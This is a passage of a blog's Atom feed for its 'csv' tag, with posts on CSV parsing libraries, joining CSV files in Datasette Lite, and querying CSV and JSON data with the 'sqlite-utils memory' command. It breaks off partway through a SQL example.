<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: csv</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/csv.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2024-03-20T00:53:29+00:00</updated><author><name>Simon Willison</name></author><entry><title>Papa Parse</title><link href="https://simonwillison.net/2024/Mar/20/papa-parse/#atom-tag" rel="alternate"/><published>2024-03-20T00:53:29+00:00</published><updated>2024-03-20T00:53:29+00:00</updated><id>https://simonwillison.net/2024/Mar/20/papa-parse/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.papaparse.com/"&gt;Papa Parse&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I’ve been trying out this JavaScript library for parsing CSV and TSV data today and I’m very impressed. It’s extremely fast, has all of the advanced features I want (streaming support, optional web workers, automatic detection of delimiters and column types), has zero dependencies and weighs just 19KB minified—6.8KB gzipped.&lt;/p&gt;

&lt;p&gt;The project is 11 years old now. It was created by Matt Holt, who later went on to create the Caddy web server. Today it’s maintained by Sergi Almacellas Abellana.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://github.com/mholt/PapaParse"&gt;mholt/PapaParse&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/matt-holt"&gt;matt-holt&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="javascript"/><category term="matt-holt"/></entry><entry><title>Introducing sqlite-xsv: The Fastest CSV Parser for SQLite</title><link href="https://simonwillison.net/2023/Jan/14/sqlite-xsv/#atom-tag" rel="alternate"/><published>2023-01-14T21:54:05+00:00</published><updated>2023-01-14T21:54:05+00:00</updated><id>https://simonwillison.net/2023/Jan/14/sqlite-xsv/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://observablehq.com/@asg017/introducing-sqlite-xsv"&gt;Introducing sqlite-xsv: The Fastest CSV Parser for SQLite&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Alex Garcia continues to push the boundaries of SQLite extensions. This new extension, written in Rust, wraps the lightning-fast Rust &lt;code&gt;csv&lt;/code&gt; crate and provides a new &lt;code&gt;csv_reader()&lt;/code&gt; virtual table that can handle regular, gzipped and zstd-compressed files.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rust"&gt;rust&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/alex-garcia"&gt;alex-garcia&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/zstd"&gt;zstd&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="sqlite"/><category term="rust"/><category term="alex-garcia"/><category term="zstd"/></entry><entry><title>Joining CSV files in your browser using Datasette Lite</title><link href="https://simonwillison.net/2022/Jun/20/datasette-lite-csvs/#atom-tag" rel="alternate"/><published>2022-06-20T21:20:16+00:00</published><updated>2022-06-20T21:20:16+00:00</updated><id>https://simonwillison.net/2022/Jun/20/datasette-lite-csvs/#atom-tag</id><summary type="html">
    &lt;p&gt;I added a new feature to &lt;a href="https://lite.datasette.io/"&gt;Datasette Lite&lt;/a&gt; - my version of &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; that runs entirely in your browser using WebAssembly (&lt;a href="https://simonwillison.net/2022/May/4/datasette-lite/"&gt;previously&lt;/a&gt;): you can now use it to load one or more CSV files by URL, and then run SQL queries against them - including joins across data from multiple files.&lt;/p&gt;
&lt;p&gt;Your CSV file needs to be hosted somewhere with &lt;code&gt;access-control-allow-origin: *&lt;/code&gt; CORS headers. Any CSV file hosted on GitHub provides these, if you use the link you get by clicking on the "Raw" version.&lt;/p&gt;
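&lt;p&gt;One quick way to check whether a file is served with that header is a &lt;code&gt;HEAD&lt;/code&gt; request - a minimal sketch using the Python &lt;code&gt;requests&lt;/code&gt; library against the file we'll load below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import requests

url = (
    "https://raw.githubusercontent.com/fivethirtyeight"
    "/data/master/fight-songs/fight-songs.csv"
)
# GitHub's raw endpoint should answer with access-control-allow-origin: *
resp = requests.head(url)
print(resp.headers.get("access-control-allow-origin"))
&lt;/code&gt;&lt;/pre&gt;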
&lt;h4&gt;Loading CSV data from a URL&lt;/h4&gt;
&lt;p&gt;Here's the URL to a CSV file of college fight songs collected by FiveThirtyEight &lt;a href="https://github.com/fivethirtyeight/data/tree/master/fight-songs"&gt;in their data repo&lt;/a&gt; as part of the reporting for &lt;a href="https://projects.fivethirtyeight.com/college-fight-song-lyrics/"&gt;this story&lt;/a&gt; a few years ago:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv"&gt;https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;You can pass this to Datasette Lite in two ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You can &lt;a href="https://lite.datasette.io/"&gt;load the web app&lt;/a&gt;, click the "Load data by URL to a CSV file" button and paste in the URL&lt;/li&gt;
&lt;li&gt;Or you can pass it as a &lt;code&gt;?csv=&lt;/code&gt; parameter to the application, like this: &lt;a href="https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv"&gt;https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once Datasette has loaded, a &lt;code&gt;data&lt;/code&gt; database will be available with a single table called &lt;code&gt;fight-songs&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;As you navigate around in Datasette the URL bar will update to reflect current state - which means you can deep-link to table views with applied filters and facets:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data/fight-songs?_facet=conference&amp;amp;_facet=student_writer&amp;amp;_facet=official_song"&gt;https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data/fight-songs?_facet=conference&amp;amp;_facet=student_writer&amp;amp;_facet=official_song&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Or even link to the result of a custom SQL query:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data?sql=select+school%2C+conference%2C+song_name%2C+writers%2C+year%2C+student_writer+spotify_id+from+%5Bfight-songs%5D+order+by+rowid+limit+101"&gt;https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data?sql=select+school%2C+conference%2C+song_name%2C+writers%2C+year%2C+student_writer+spotify_id+from+%5Bfight-songs%5D+order+by+rowid+limit+101&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;Loading multiple files and joining data&lt;/h4&gt;
&lt;p&gt;You can pass the &lt;code&gt;?csv=&lt;/code&gt; parameter more than once to load data from multiple CSV files into the same virtual &lt;code&gt;data&lt;/code&gt; database. Each CSV file will result in a separate table.&lt;/p&gt;
&lt;p&gt;For this demo I'll use two CSV files.&lt;/p&gt;
&lt;p&gt;The first is &lt;a href="https://github.com/nytimes/covid-19-data/blob/master/us-counties-recent.csv"&gt;us-counties-recent.csv&lt;/a&gt; from the NY Times &lt;a href="https://github.com/nytimes/covid-19-data"&gt;covid-19-data&lt;/a&gt; repository, which lists the most recent numbers for Covid cases for every US county.&lt;/p&gt;
&lt;p&gt;The second is &lt;a href="https://github.com/simonw/covid-19-datasette/blob/main/us_census_county_populations_2019.csv"&gt;us_census_county_populations_2019.csv&lt;/a&gt;, a CSV file listing the population of each county according to the 2019 US Census which I extracted from &lt;a href="https://www.census.gov/data/datasets/time-series/demo/popest/2010s-state-total.html"&gt;this page&lt;/a&gt; on the US Census website.&lt;/p&gt;
&lt;p&gt;Both of those tables include a column called &lt;code&gt;fips&lt;/code&gt;, representing the &lt;a href="https://en.wikipedia.org/wiki/FIPS_county_code"&gt;FIPS county code&lt;/a&gt; for each county. These 4-5 digit codes are ideal for joining the two tables.&lt;/p&gt;
&lt;p&gt;Here's a SQL query which joins the two tables, filters for the data for the most recent date represented (using &lt;code&gt;where date = (select max(date) from [us-counties-recent])&lt;/code&gt;) and calculates &lt;code&gt;cases_per_million&lt;/code&gt; using the cases and the population:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt;
  [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent].&lt;span class="pl-k"&gt;*&lt;/span&gt;,
  &lt;span class="pl-c1"&gt;us_census_county_populations_2019&lt;/span&gt;.&lt;span class="pl-c1"&gt;population&lt;/span&gt;,
  &lt;span class="pl-c1"&gt;1&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent].cases &lt;span class="pl-k"&gt;/&lt;/span&gt; &lt;span class="pl-c1"&gt;us_census_county_populations_2019&lt;/span&gt;.&lt;span class="pl-c1"&gt;population&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-c1"&gt;1000000&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; cases_per_million
&lt;span class="pl-k"&gt;from&lt;/span&gt;
  [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent]
  &lt;span class="pl-k"&gt;join&lt;/span&gt; us_census_county_populations_2019 &lt;span class="pl-k"&gt;on&lt;/span&gt; &lt;span class="pl-c1"&gt;us_census_county_populations_2019&lt;/span&gt;.&lt;span class="pl-c1"&gt;fips&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent].fips
&lt;span class="pl-k"&gt;where&lt;/span&gt;
  &lt;span class="pl-k"&gt;date&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; (&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-c1"&gt;max&lt;/span&gt;(&lt;span class="pl-k"&gt;date&lt;/span&gt;) &lt;span class="pl-k"&gt;from&lt;/span&gt; [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent])
&lt;span class="pl-k"&gt;order by&lt;/span&gt;
  cases_per_million &lt;span class="pl-k"&gt;desc&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/datasette-lite-csv-join.png" alt="A screenshot of that query running in Datasette. Loving county Texas has the worst result - 1,289,940 cases per million - but that's because they have a population of just 169 people and 218 recorded cases." style="max-width:100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And since everything in Datasette Lite can be bookmarked, here's the super long URL (&lt;a href="https://lite.datasette.io/?csv=https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties-recent.csv&amp;amp;csv=https://raw.githubusercontent.com/simonw/covid-19-datasette/main/us_census_county_populations_2019.csv#/data?sql=select%0A++%5Bus-counties-recent%5D.*%2C%0A++us_census_county_populations_2019.population%2C%0A++1.0+*+%5Bus-counties-recent%5D.cases+%2F+us_census_county_populations_2019.population+*+1000000+as+cases_per_million%0Afrom%0A++%5Bus-counties-recent%5D%0A++join+us_census_county_populations_2019+on+us_census_county_populations_2019.fips+%3D+%5Bus-counties-recent%5D.fips%0Awhere%0A++date+%3D+%28select+max%28date%29+from+%5Bus-counties-recent%5D%29%0Aorder+by%0A++cases_per_million+desc"&gt;clickable version here&lt;/a&gt;) that executes that query against those two CSV files:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;https://lite.datasette.io/?csv=https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties-recent.csv&amp;amp;csv=https://raw.githubusercontent.com/simonw/covid-19-datasette/main/us_census_county_populations_2019.csv#/data?sql=select%0A++%5Bus-counties-recent%5D.*%2C%0A++us_census_county_populations_2019.population%2C%0A++1.0+*+%5Bus-counties-recent%5D.cases+%2F+us_census_county_populations_2019.population+*+1000000+as+cases_per_million%0Afrom%0A++%5Bus-counties-recent%5D%0A++join+us_census_county_populations_2019+on+us_census_county_populations_2019.fips+%3D+%5Bus-counties-recent%5D.fips%0Awhere%0A++date+%3D+%28select+max%28date%29+from+%5Bus-counties-recent%5D%29%0Aorder+by%0A++cases_per_million+desc&lt;/code&gt;&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webassembly"&gt;webassembly&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette-lite"&gt;datasette-lite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cors"&gt;cors&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="projects"/><category term="sql"/><category term="datasette"/><category term="webassembly"/><category term="datasette-lite"/><category term="cors"/></entry><entry><title>Joining CSV and JSON data with an in-memory SQLite database</title><link href="https://simonwillison.net/2021/Jun/19/sqlite-utils-memory/#atom-tag" rel="alternate"/><published>2021-06-19T22:55:57+00:00</published><updated>2021-06-19T22:55:57+00:00</updated><id>https://simonwillison.net/2021/Jun/19/sqlite-utils-memory/#atom-tag</id><summary type="html">
    &lt;p&gt;The new &lt;code&gt;sqlite-utils memory&lt;/code&gt; command can import CSV and JSON data directly into an in-memory SQLite database, combine and query it using SQL and output the results as CSV, JSON or various other formats of plain text tables.&lt;/p&gt;
&lt;h4&gt;sqlite-utils memory&lt;/h4&gt;
&lt;p&gt;The new feature is part of &lt;a href="https://sqlite-utils.datasette.io/en/latest/changelog.html#v3-10"&gt;sqlite-utils 3.10&lt;/a&gt;, which I released this morning. You can install it using &lt;code&gt;brew install sqlite-utils&lt;/code&gt; or &lt;code&gt;pip install sqlite-utils&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I've recorded &lt;a href="https://www.youtube.com/watch?v=OUjd0rkc678"&gt;this video&lt;/a&gt; demonstrating the new feature - with full accompanying notes below.&lt;/p&gt;

&lt;iframe style="max-width: 100%" width="560" height="315" src="https://www.youtube-nocookie.com/embed/OUjd0rkc678" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="allowfullscreen"&gt; &lt;/iframe&gt;

&lt;p&gt;&lt;code&gt;sqlite-utils&lt;/code&gt; already offers a mechanism for importing CSV and JSON data into a SQLite database file, in the form of the &lt;a href="https://sqlite-utils.datasette.io/en/stable/cli.html#cli-inserting-data"&gt;sqlite-utils insert&lt;/a&gt; command. Processing data with this involves two steps: first import it into a &lt;code&gt;temp.db&lt;/code&gt; file, then use &lt;a href="https://sqlite-utils.datasette.io/en/stable/cli.html#running-sql-queries"&gt;sqlite-utils query&lt;/a&gt; to run queries and output the results.&lt;/p&gt;
&lt;p&gt;Using SQL to re-shape data is really useful - since &lt;code&gt;sqlite-utils&lt;/code&gt; can output in multiple different formats, I frequently find myself loading in a CSV file and exporting it back out as JSON, or vice-versa.&lt;/p&gt;
&lt;p&gt;This week I realized that I had most of the pieces in place to reduce this to a single step. The new &lt;code&gt;sqlite-utils memory&lt;/code&gt; command (&lt;a href="https://sqlite-utils.datasette.io/en/stable/cli.html#cli-memory"&gt;full documentation here&lt;/a&gt;) operates against a temporary, in-memory SQLite database. It can import data, execute SQL and output the result in a one-liner, without needing any temporary database files along the way.&lt;/p&gt;
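&lt;p&gt;Conceptually the command does something like the following - a rough sketch using the &lt;code&gt;sqlite_utils&lt;/code&gt; Python library, not the command's actual implementation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import json
import sys

import sqlite_utils

# Throwaway in-memory database: load rows from stdin, query, print
db = sqlite_utils.Database(memory=True)
db["stdin"].insert_all(json.load(sys.stdin))
for row in db.query("select * from stdin limit 3"):
    print(row)
&lt;/code&gt;&lt;/pre&gt;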
&lt;p&gt;Here's an example. My &lt;a href="https://github.com/dogsheep"&gt;Dogsheep&lt;/a&gt; GitHub organization has a number of repositories. GitHub make those available via an authentication-optional API endpoint at &lt;a href="https://api.github.com/users/dogsheep/repos"&gt;https://api.github.com/users/dogsheep/repos&lt;/a&gt; - which returns JSON that looks like this (simplified):&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;[
  {
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;id&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;197431109&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;name&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;dogsheep-beta&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;full_name&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;dogsheep/dogsheep-beta&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;size&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;61&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;stargazers_count&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;79&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;watchers_count&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;79&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;forks&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;0&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;open_issues&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;11&lt;/span&gt;
  },
  {
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;id&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;256834907&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;name&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;dogsheep-photos&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;full_name&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;dogsheep/dogsheep-photos&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;size&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;64&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;stargazers_count&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;116&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;watchers_count&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;116&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;forks&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;5&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;open_issues&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;18&lt;/span&gt;
  }
]&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With &lt;code&gt;sqlite-utils memory&lt;/code&gt; we can see the 3 most popular repos by number of stars like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' -t
full_name                     forks_count    stars
--------------------------  -------------  -------
dogsheep/twitter-to-sqlite             12      225
dogsheep/github-to-sqlite              14      139
dogsheep/dogsheep-photos                5      116
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We're using &lt;code&gt;curl&lt;/code&gt; to fetch the JSON and pipe it into &lt;code&gt;sqlite-utils memory&lt;/code&gt; - the &lt;code&gt;-&lt;/code&gt; means "read from standard input". Then we pass the following SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; full_name, forks_count, stargazers_count &lt;span class="pl-k"&gt;as&lt;/span&gt; stars
&lt;span class="pl-k"&gt;from&lt;/span&gt; stdin &lt;span class="pl-k"&gt;order by&lt;/span&gt; stars &lt;span class="pl-k"&gt;desc&lt;/span&gt; &lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;3&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;stdin&lt;/code&gt; is the temporary table created for the data piped into the tool. The query selects three of the JSON properties, renames &lt;code&gt;stargazers_count&lt;/code&gt; to &lt;code&gt;stars&lt;/code&gt;, sorts by stars and returns the first three.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;-t&lt;/code&gt; option here means "output as a formatted table" - without that option we get JSON:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    '  
[{"full_name": "dogsheep/twitter-to-sqlite", "forks_count": 12, "stars": 225},
 {"full_name": "dogsheep/github-to-sqlite", "forks_count": 14, "stars": 139},
 {"full_name": "dogsheep/dogsheep-photos", "forks_count": 5, "stars": 116}]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or we can use &lt;code&gt;--csv&lt;/code&gt; to get back CSV:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' --csv
full_name,forks_count,stars
dogsheep/twitter-to-sqlite,12,225
dogsheep/github-to-sqlite,14,139
dogsheep/dogsheep-photos,5,116
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;-t&lt;/code&gt; option supports a number of different formats, specified using &lt;code&gt;--fmt&lt;/code&gt;. If I wanted to generate a LaTeX table of the top repos by stars I could do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' -t --fmt=latex
\begin{tabular}{lrr}
\hline
 full\_name                  &amp;amp;   forks\_count &amp;amp;   stars \\
\hline
 dogsheep/twitter-to-sqlite &amp;amp;            12 &amp;amp;     225 \\
 dogsheep/github-to-sqlite  &amp;amp;            14 &amp;amp;     139 \\
 dogsheep/dogsheep-photos   &amp;amp;             5 &amp;amp;     116 \\
\hline
\end{tabular}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can run aggregate queries too - let's add up the total size and total number of stars across all of those repositories:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
| sqlite-utils memory - '
    select sum(size), sum(stargazers_count) from stdin
' -t
  sum(size)    sum(stargazers_count)
-----------  -----------------------
        843                      934
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(I believe size here is measured in kilobytes: the GitHub API documentation isn't clear on this point.)&lt;/p&gt;
&lt;h4 id="joining-across-different-files"&gt;Joining across different files&lt;/h4&gt;
&lt;p&gt;All of these examples have worked with JSON data piped into the tool - but you can also pass one or more files, of different formats, in a way that lets you execute joins against them.&lt;/p&gt;
&lt;p&gt;As an example, let's combine two sources of data.&lt;/p&gt;
&lt;p&gt;The New York Times publish a &lt;a href="https://github.com/nytimes/covid-19-data/blob/master/us-states.csv"&gt;us-states.csv&lt;/a&gt; file with Covid cases and deaths by state over time.&lt;/p&gt;
&lt;p&gt;The CDC have an &lt;a href="https://covid.cdc.gov/covid-data-tracker/COVIDData/getAjaxData?id=vaccination_data"&gt;undocumented JSON endpoint&lt;/a&gt; (which I've been &lt;a href="https://github.com/simonw/cdc-vaccination-history"&gt;archiving here&lt;/a&gt;) tracking the progress of vaccination across different states.&lt;/p&gt;
&lt;p&gt;We're going to run a join from that CSV data to that JSON data, and output a table of results.&lt;/p&gt;
&lt;p&gt;First, we need to download the files. The &lt;a href="https://covid.cdc.gov/covid-data-tracker/COVIDData/getAjaxData?id=vaccination_data"&gt;CDC JSON data&lt;/a&gt; isn't quite in the right shape for our purposes:&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;{
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;runid&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;2023&lt;/span&gt;,
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;vaccination_data&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: [
    {
      &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Date&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;2021-06-19&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Location&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;US&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;ShortName&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;USA&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-s"&gt;...&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;sqlite-utils&lt;/code&gt; expects a flat JSON array of objects - we can use &lt;a href="https://stedolan.github.io/jq/"&gt;jq&lt;/a&gt; to re-shape the data like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl https://covid.cdc.gov/covid-data-tracker/COVIDData/getAjaxData?id=vaccination_data \
  | jq .vaccination_data &amp;gt; vaccination_data.json
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The New York Times data is good as is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ wget 'https://github.com/nytimes/covid-19-data/raw/master/us-states.csv'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now that we have the data locally, we can run a join to combine it using the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sqlite-utils memory us-states.csv vaccination_data.json "
  select
    max(t1.date),
    t1.state,
    t1.cases,
    t1.deaths,
    t2.Census2019,
    t2.Dist_Per_100K
  from
    t1
